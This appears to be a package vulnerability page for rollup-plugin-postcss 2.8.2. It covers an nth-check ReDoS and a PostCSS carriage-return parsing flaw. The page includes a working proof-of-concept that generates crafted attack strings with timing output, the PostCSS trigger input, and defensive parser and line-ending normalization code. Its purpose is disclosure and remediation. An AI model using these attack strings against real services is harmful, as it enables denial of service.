rollup-plugin-postcss integrates PostCSS into Rollup builds so that CSS is processed as part of the JavaScript bundling pipeline. Version 2.8.2 is a patch release that followed 2.8.1 shortly afterwards. Comparing the two package manifests, the dependencies and devDependencies are identical, which points to a bug fix or a small internal adjustment rather than new functionality. Both versions rely on cssnano for CSS minification, postcss-modules for CSS Modules support, and style-inject for injecting the generated styles into the DOM.
The only visible difference is in the dist metadata: the unpackedSize grew from 37934 bytes in 2.8.1 to 38155 bytes in 2.8.2, a 221-byte increase. A delta that small is consistent with a targeted fix rather than a structural change, and the unchanged dependency lists indicate that the plugin's API surface and its build and test setup are the same in both releases.
Upgrading to 2.8.2 is recommended, particularly if you have hit edge cases or stability problems with 2.8.1. Check the project's changelog or release notes, where published, for the specific fix. Because this is a patch-level bump (2.8.1 to 2.8.2), semantic versioning implies no API changes, and the upgrade should be a drop-in replacement. Note that upgrading the plugin itself does not change which versions of its transitive dependencies are resolved in your lock file; run npm ls postcss nth-check (or the equivalent for your package manager) to see which versions your build actually pulls in, since the vulnerabilities listed below live in those packages rather than in the plugin's own code.
All known vulnerabilities affecting version 2.8.2 of the package (through its dependency tree)
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-check formulas (the an+b argument of :nth-child() and friends). It was fixed in nth-check 2.0.1.
The ReDoS behaviour of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency: the two \s* quantifiers sit next to each other with nothing between them that fails fast, so on an input that cannot match the engine tries every way of splitting a run of whitespace between them. It can be exploited with the following code.
Proof of Concept
// PoC.js
// Each iteration builds "2n" followed by i*10000 spaces and a "!" that can never
// match, then times how long nth-check takes to reject it. The loop bound is far
// larger than anyone will wait for; the run below was stopped after five iterations.
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)   // throws on invalid input, after backtracking
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output (note that the time grows much faster than the input length)
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
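To show where the quadratic cost comes from and what a non-backtracking parser for the same grammar looks like, here is an added example. It is not nth-check's source: VULNERABLE_RE is a hypothetical pattern built around the sub-pattern quoted in the advisory, parseNth is a hand-written linear-time parser for the CSS an+b microsyntax, and attackString reproduces the advisory's input at a size that finishes quickly.

```javascript
// Added example (not nth-check's code): a hypothetical regex built around the
// advisory's sub-pattern \s*(?:([+-]?)\s*(\d+))?, next to a hand-written,
// linear-time parser for the an+b microsyntax that cannot be made to backtrack.

// Hypothetical pattern: an optional "an" term, then the quoted sub-pattern.
// The two \s* quantifiers are adjacent and both optional, so on
// "2n" + spaces + "!" the engine tries every split of the spaces between them
// before concluding there is no match: O(spaces^2) work.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

function coefficient(term) {            // "2n" -> 2, "n" -> 1, "-n" -> -1
  const s = term.slice(0, -1);          // drop the trailing "n"
  if (s === "" || s === "+") return 1;
  if (s === "-") return -1;
  return parseInt(s, 10);
}

function parseWithRegex(formula) {
  const m = VULNERABLE_RE.exec(formula.trim());
  if (m === null) throw new Error("invalid nth formula: " + JSON.stringify(formula.slice(0, 20)));
  const a = m[1] ? coefficient(m[1]) : 0;
  const b = m[3] ? (m[2] === "-" ? -1 : 1) * parseInt(m[3], 10) : 0;
  return [a, b];
}

// Linear-time replacement: one left-to-right pass, each character consumed at
// most once, no backtracking. Accepts even | odd | an+b | an | b; the sign
// before b is required, as in the CSS an+b grammar.
function parseNth(formula) {
  const s = String(formula).trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];
  const n = s.length;
  let i = 0;
  const skipSpaces = () => { while (i < n && /\s/.test(s[i])) i++; };
  const readSign = () =>
    (i < n && (s[i] === "+" || s[i] === "-")) ? (s[i++] === "-" ? -1 : 1) : 1;
  const readDigits = () => {
    const start = i;
    while (i < n && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };

  const sign = readSign();
  const digits = readDigits();
  let a = 0, b = 0;
  if (i < n && s[i] === "n") {          // "an" term present
    a = sign * (digits === "" ? 1 : parseInt(digits, 10));
    i++;
    skipSpaces();
    if (i < n) {                        // optional "+b" / "-b" part
      if (s[i] !== "+" && s[i] !== "-") throw new Error("invalid nth formula: expected sign at " + i);
      const bSign = s[i++] === "-" ? -1 : 1;
      skipSpaces();
      const bDigits = readDigits();
      if (bDigits === "") throw new Error("invalid nth formula: expected digits at " + i);
      b = bSign * parseInt(bDigits, 10);
    }
  } else {                              // plain "b" form
    if (digits === "") throw new Error("invalid nth formula: expected digits at " + i);
    b = sign * parseInt(digits, 10);
  }
  if (i !== n) throw new Error("invalid nth formula: trailing input at " + i);
  return [a, b];
}

// The advisory's attack string, scaled by the number of spaces.
function attackString(spaces) {
  return "2n" + " ".repeat(spaces) + "!";
}

// Time one parse attempt. Both parsers reject the attack string; the point is how fast.
function timeParse(parse, formula) {
  const t0 = Date.now();
  let accepted = true;
  try { parse(formula); } catch (e) { accepted = false; }
  return { accepted, ms: Date.now() - t0 };
}

for (const spaces of [1000, 2000, 4000]) {
  const s = attackString(spaces);
  console.log(`${spaces} spaces: regex ${timeParse(parseWithRegex, s).ms} ms, ` +
              `linear parser ${timeParse(parseNth, s).ms} ms`);
}
```

Doubling the number of spaces roughly quadruples the regex time while the hand-written parser stays flat, which is the signature to look for when triaging a suspected ReDoS. Where rewriting the parser is not an option, capping the length of untrusted selector input before it reaches the regex bounds the worst case.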
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31 (the fix is to upgrade to 8.4.31 or later). It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment, so a linter's view of the stylesheet and what a browser will actually apply no longer agree.
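The upgrade is the fix; as an added defence-in-depth check for pipelines that cannot move to 8.4.31 immediately, the following example (written for this page, not PostCSS's own code) flags bare carriage returns in untrusted CSS and normalizes line endings before the text is handed to a parser. The sample input is the advisory's trigger, embedded as a constructed JavaScript string; the function names are this example's own.

```javascript
// Added example (not PostCSS's code): detect bare CR characters, the ingredient
// of the CVE-2023-44270 discrepancy, and normalize line endings before parsing.

// Constructed sample input: the advisory's trigger as a JS string (\r is a real
// carriage return here, not the two characters backslash and r).
const SAMPLE = "@font-face{ font:(\r/*);}";

// Return every CR that is not the first half of a CRLF pair, with 1-based
// line and column so the finding can be reported like a lint message.
function findBareCarriageReturns(css) {
  const hits = [];
  let line = 1;
  let column = 1;
  for (let i = 0; i < css.length; i++) {
    const ch = css[i];
    if (ch === "\r") {
      const pairedWithLf = css[i + 1] === "\n";
      if (!pairedWithLf) hits.push({ index: i, line, column });
      if (pairedWithLf) i++;            // consume the LF of a CRLF pair
      line++;
      column = 1;
      continue;
    }
    if (ch === "\n") {
      line++;
      column = 1;
      continue;
    }
    column++;
  }
  return hits;
}

// Rewrite CRLF and bare CR to LF so that every consumer (linter, bundler,
// browser) sees the same line structure.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, "\n");
}

// Policy hook for untrusted input: either reject on bare CR or normalize.
// Whatever you choose, apply it to the bytes you serve as well as the bytes
// you lint, otherwise the two views can still diverge.
function prepareUntrustedCss(css, options) {
  const reject = Boolean(options && options.reject);
  const bare = findBareCarriageReturns(css);
  if (reject && bare.length > 0) {
    const where = bare.map((h) => h.line + ":" + h.column).join(", ");
    throw new Error("bare carriage return in CSS at " + where);
  }
  return normalizeLineEndings(css);
}

const findings = findBareCarriageReturns(SAMPLE);
console.log("bare CR findings:", JSON.stringify(findings));
console.log("normalized:", JSON.stringify(prepareUntrustedCss(SAMPLE)));
```

On the sample the scanner reports one bare CR at line 1, column 19, and normalization turns it into a plain newline, so the (/* sequence is then tokenized the same way by any parser that understands LF line breaks.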